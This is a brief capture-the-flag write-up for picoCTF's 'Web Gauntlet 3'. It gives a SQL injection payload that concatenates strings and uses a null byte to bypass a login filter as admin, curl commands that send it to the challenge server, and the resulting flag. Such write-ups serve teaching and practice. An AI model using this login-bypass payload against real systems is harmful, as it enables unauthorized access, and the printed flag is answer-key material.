Web Gauntlet 3
Last updated
Was this helpful?
Last updated
Was this helpful?
Last time, I promise! Only 25 characters this time. Log in as admin Site: Filter:
The solution to this challenge is completely identical to my solution to .
The solution query is user=ad'||'min'%00
and it can be sent using cURL like so: curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
The flag can be retrieved using this command: curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
. See for more information.
The code for the filter and the flag are shown in /filter.php
when the login is bypassed:
picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}